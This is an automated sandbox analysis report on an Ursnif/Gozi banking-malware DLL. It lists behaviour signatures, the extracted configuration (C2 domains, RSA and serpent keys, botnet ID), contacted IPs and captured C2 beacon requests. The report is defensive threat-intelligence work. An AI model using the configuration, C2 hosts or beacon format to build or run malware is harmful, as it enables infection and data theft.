Windows Analysis Report 6.png

Overview

General Information

Sample Name: 6.png (renamed file extension from png to dll)
Analysis ID: 539457
MD5: ac57d694b86d8532b38d3d62f6de3afc
SHA1: c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256: fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags: dll, exe, geofenced, Gozi, isfb, ITA, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 6.dll Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: 6.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: 6.dll String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 6.dll String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: 6.dll String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.337960981.0000000003382000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316290862.0000000003383000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.397630801.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400300965.000001497A51A000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.400801988.000001497A51A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 6.dll String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: 6.dll String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 6.dll String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 6.dll String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 6.dll String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: 6.dll String found in binary or memory: http://ocsp.digicert.com0C
Source: 6.dll String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 6.dll String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/MicrosoftEdgeDownload"
Source: rundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmp String found in binary or memory: https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html
Source: rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/
Source: regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/BS
Source: rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp String found in binary or memory: https://berukoneru.website/LAp
Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/O
Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/j
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/jP
Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website/tyi
Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp String found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax"
Source: 6.dll String found in binary or memory: https://nodejs.org0
Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/
Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp String found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
Source: 6.dll String found in binary or memory: https://www.digicert.com/CPS0
Source: 6.dll String found in binary or memory: https://www.globalsign.com/repository/0
Source: 6.dll String found in binary or memory: https://www.globalsign.com/repository/03
Source: unknown DNS traffic detected: queries for: windows.update3.com
